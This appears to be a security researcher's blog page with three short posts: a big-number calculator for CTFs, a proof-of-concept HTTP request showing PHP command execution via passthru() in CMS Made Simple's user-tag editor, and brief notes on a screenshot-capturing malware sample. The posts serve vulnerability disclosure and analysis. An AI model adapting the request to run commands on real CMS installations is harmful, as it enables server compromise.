With the recent CTF’s I’ve played, I thought of coding an app to calculate big numbers easily, instead of manually programming. At times playing with big numbers is painful. I have written this in MASM32 and have used biglib for big numbers.
Download:
https://github.com/OsandaMalith/Cryptculator/releases/tag/v1.33.7
One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.
In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.
[code language=”text”]
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache
_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru(‘dir’)%3B&description=&run=1&apply=1&ajax=1
[/code]
I felt bored and thought of having a look at this exe. These are my rough notes on this one.
Every 5 seconds the function ‘401851’ is called.
Basically, this malware takes screenshots and encrypts them and stores them in the current directory starting with “temp%08x” % GetTickCount().
